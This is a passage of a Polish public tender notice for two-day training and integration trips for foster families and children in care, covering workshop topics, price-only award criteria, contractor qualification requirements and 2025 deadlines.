kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 4) Część IV zadania – IV turnus wyjazdowy (dwudniowy)<br/> a) „Kryzys w rodzinie zastępczej – warsztaty dla rodzin zastępczych”;<br/> b) „Kryzys w rodzinie zastępczej – warsztaty dla dzieci i młodzieży przebywającej w pieczy zastępczej”.<br/> Uwagi do tematów zadań:<br/> g) „Kryzys w rodzinie zastępczej – warsztaty dla rodzin zastępczych” (Część IV zadania),- Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka – do 20 osób w 2025 roku;<br/> h) „Kryzys w rodzinie zastępczej – warsztaty dla dzieci i młodzieży przebywającej w pieczy zastępczej” (Część IV zadania),- Grupa wsparcia – do 20 osób w 2025 roku (dzieci i młodzież, w tym usamodzielniani);<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 5) Część V zadania – V turnus wyjazdowy (dwudniowy)<br/> a) „Pierwsza pomoc w rodzinie zastępczej – warsztaty dla rodzin zastępczych”;<br/> b) „Pierwsza pomoc w rodzinie zastępczej – warsztaty dla dzieci i młodzieży przebywającej w pieczy zastępczej”.<br/> Uwagi do tematów zadań:<br/> i) „Pierwsza pomoc w rodzinie zastępczej – warsztaty dla rodzin zastępczych” (Część V zadania),- Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka – do 20 osób w 2025 roku;<br/> j) „Pierwsza pomoc w rodzinie zastępczej – warsztaty dla dzieci i młodzieży przebywającej w pieczy zastępczej” (Część V zadania),- Grupa wsparcia – do 20 osób w 2025 roku (dzieci i młodzież, w tym usamodzielniani);<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca realizacji zadania, którym jest dwudniowy wyjazd integracyjno-szkoleniowy<br/> w postaci warsztatów dla rodzin zastępczych i prowadzących rodzinny dom dziecka wraz z dziećmi i młodzieżą<br/> przebywającymi w pieczy zastępczej, w tym usamodzielnianych pn. „Wsparcie grupowe dla dzieci w pieczy zastępczej oraz<br/> dla rodzin zastępczych”. Celem zadania jest: <br/>• przeprowadzenie wyjazdowych warsztatów o różnej tematyce,<br/> • zmiana otoczenia i odciążenie od codziennych obowiązków,<br/> • integracja osób pełniących funkcję rodzica zastępczego i prowadzących rodzinny dom dziecka oraz dla dzieci i młodzieży<br/> przebywających w pieczy zastępczej, w tym usamodzielnianych;- działania wzmacniające kompetencje społeczne w ramach projektu pn. „Wsparcie deinstytucjonalizacji pieczy zastępczej w<br/> podregionie pilskim”. Działanie 6.15 Wsparcie rodziny i systemu pieczy zastępczej w ramach Programu Regionalnego<br/> Fundusze Europejskie dla Wielkopolski 2021 – 2027 współfinansowanego ze środków Europejskiego Funduszu<br/> Społecznego Plus.<br/> 6) Część VI zadania – VI turnus wyjazdowy (dwudniowy)<br/> a) „Profilaktyka uzależnień od social mediów i innych cyberzagrożeń – warsztaty dla rodzin zastępczych”;<br/> b) „Profilaktyka uzależnień od social mediów i innych cyberzagrożeń – warsztaty dla dzieci i młodzieży przebywającej w<br/> pieczy zastępczej”.<br/> Uwagi do tematów zadań:<br/> k) „Profilaktyka uzależnień od social mediów i innych cyberzagrożeń – warsztaty dla rodzin zastępczych (Część VI zadania),- Grupa wsparcia dla rodziców zastępczych i prowadzących rodzinny dom dziecka” – do 20 osób w 2025 roku;<br/> l) „Profilaktyka uzależnień od social mediów i innych cyberzagrożeń – warsztaty dla dzieci i młodzieży przebywającej w<br/> pieczy zastępczej” (Część VI zadania),- Grupa wsparcia – do 20 osób w 2025 roku (dzieci i młodzież, w tym usamodzielniani).<br/> Szczegółowe informacje znajdują się w Rozdziale IV. III. do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</p> <p class="mb-0">55241000-1 - Usługi w zakresie ośrodków wypoczynkowych</p> <p class="mb-0">60172000-4 - Wynajem autobusów i autokarów wraz z kierowcą</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami<br/> oceny ofert:<br/> Cena (C) - waga kryterium 100 %<br/> Sposób oceny oferty:<br/> 1. Zamawiający przystąpi do oceny złożonych ofert przy zastosowaniu podanych kryteriów wyłącznie w stosunku do ofert złożonych<br/> przez Wykonawców niepodlegających wykluczeniu oraz ofert niepodlegających odrzuceniu. <br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najniższą cenę, obliczoną wg wzoru: C = Cmin/Cb<br/> Gdzie: <br/>Cmin – najniższa cena brutto ze wszystkich cen zaproponowanych przez oferentów <br/>Cb – cena brutto oferty badanej<br/> 3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty.<br/> Szczegółowe informacje znajdują się w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/> a) nie podlegają wykluczeniu na podstawie:<br/> art. 108 ust. 1 Ustawy PZP (obligatoryjne podstawy wykluczenia) <br/>art. 109 ust. 1 pkt. 4 Ustawy PZP (z postępowania o udzielenie zamówienia wyklucza się wykonawcę w stosunku do<br/> którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami,<br/> którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnejprocedury przewidzianej w przepisach miejsca wszczęcia tej procedury).<br/> art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/> agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 r., poz. 507).<br/> Wykluczenie wykonawcy następuje zgodnie z art. 111 ustawy.<br/> b) spełniają warunki udziału w postępowaniu, określone w rozdziale XVI. ust. 2.<br/> 2. Wykonawca winien dysponować osobą zdolną do wykonania zamówienia dedykowaną do jego realizacji.<br/> Ocena spełnienia warunku będzie dokonana wg. formuły spełnia/nie spełnia.<br/> Wymaga się zapewnienia minimum jednego prowadzącego spełniającego niżej wskazane kryteria<br/> 1) Wykonawca powinien wykazać Zamawiającemu, że w okresie ostatnich 2 lat przed upływem terminu składania ofert, a<br/> jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje co najmniej 1 zamówienie<br/> polegające na zrealizowaniu wyjazdu integracyjno-szkoleniowego dla rodzin zastępczych i prowadzących rodzinny dom<br/> dziecka wraz z dziećmi i młodzieżą przebywającą w pieczy zastępczej wraz z załączeniem dowodów czy usługi te zostały<br/> wykonane lub są należycie wykonane.<br/> 2) o udzielenie zamówienia dla poszczególnych Części zadań mogą ubiegać się wykonawcy, którzy wykażą minimalne<br/> poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia: −<br/> pedagog/socjolog/psycholog– minimalne wymagania: Kwalifikacje zawodowe: wykształcenie wyższe magisterskie na<br/> kierunku pedagogika/socjologia/psycholog oraz spełnianie warunków określonych w art. 7b ustawy z dnia 9 czerwca 2011 r.<br/> o wspieraniu rodziny i systemie pieczy zastępczej (Dz. U. z 2025 r. poz. 49). W zakresie niezbędnego doświadczenia do<br/> wykonywania obowiązków pedagoga/socjologa/psychologa należy wykazać, że wskazana w/w osoby posiadają co najmniej<br/> 2 - letnie doświadczenie w poradnictwie rodzinnym.<br/> 3) Wykonawca oświadcza, że posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych;<br/> 4) Wykonawca nie jest skazany prawomocnym wyrokiem za umyślne przestępstwo lub umyślne przestępstwo skarbowe;<br/> 5) Osoba wskazana do prowadzenia kursu nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym, zgodnie z<br/> art. 21 ust. 2 ustawy z dna 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym oraz nie<br/> figuruje w Krajowym Rejestrze Karnym, zgodnie z 21 art. ust. 3 ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu<br/> zagrożeniom przestępczością na tle seksualnym.<br/> 6) Wykonawca oświadcza, że nie jest powiązany kapitałowo lub osobowo z Zamawiającym.<br/> 7) Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dopuszcza łączne<br/> spełnienie warunku przez Wykonawców.<br/> 8) Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/> posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/> zawodowych wykonawcy w inne przedsięwzięcie gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/> zamówienia.<br/> Inne istotne informacje znajdują się w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Informacje znajdują się w SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty wykonawca dołącza aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o<br/> niepodleganiu wykluczeniu z postępowania – zał. nr 1 do SIWZ<br/> Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/> udziału w postępowaniu.<br/> 2. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni<br/> od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/> 3. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na<br/> każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych aktualnych na dzień ich złożenia.<br/> 4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/> 1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/> zakresie at. 109 ust.1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/> 2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SWZ);<br/> 5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 4 pkt. 1 - składa dokument lub dokumenty wystawione w kraju, w który wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/> innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/> 6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 5, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lubgospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/> 7. Dokumenty i oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/> 8. W zakresie nieuregulowanym ustawa PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Inne istotne informacje znajdują się SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Przedmiotowe środki dowodowe wymagane od Wykonawcy będą obejmowały opisy urządzeń technicznych oraz środków<br/> organizacyjno – technicznych stosowanych przez Wykonawcę w celu zapewnienia jakości usługi tj.:- opis zakwaterowania (np. ośrodek wypoczynkowy, hotel) w szczególności podanie nazwy, adresu, ilości gwiazdek.<br/> 2. Niniejsze dokumenty Wykonawca składa wraz z ofertą.<br/> 3. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone środki dowodowe są niekompletne,<br/> Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Szczegółowy opis środków dowodowych znajduje się SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Szczegółowy opis innych wymaganych oświadczeń lub dokumentów znajduje się SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia<br/>2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>3) Jeżeli oferta wykonawców występujących wspólnie została wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców – jeżeli nie została złożona wraz z ofertą<br/>4) W przypadku wykonawców wspólnie ubiegających się o zamówienie, oświadczenia, o których mowa w pkt. 9.1 SWZ<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>5) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>Szczegółowe informacje znajdują się SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">poprzez Platformę ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-17 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający dopuszcza składanie ofert częściowych.<br/>2) Zamawiający nie dopuszcza możliwości składania ofert wariantowych. oraz w postaci katalogów elektronicznych.<br/>3) Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.<br/>4) Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>5) Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez wykonawców, o których mowa w art. 94 ustawy PZP.<br/>6) Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP<br/>7) Wszelkie rozliczenia pomiędzy zamawiającym, a wykonawcą prowadzone będę w PLN.<br/>8) Zamawiający nie przewiduje wizji lokalnej<br/>Ponadto:<br/>22. POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ<br/>1. Zgodnie z ustawą Prawo Zamówień Publicznych wniesienie odwołania przysługuje na:<br/>• niezgodną z przepisami ustawy czynność zamawiającego, podjęta w postępowaniu;<br/>• zaniechanie czynności w postępowaniu, do której zamawiający był obowiązany na podstawie ustawy;<br/>2. Odwołania wnosi się w terminach przewidzianych w art. 515 ustawy PZP.<br/>3. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust.1 Ustawy PZP, stronom oraz uczestnikom postępowania 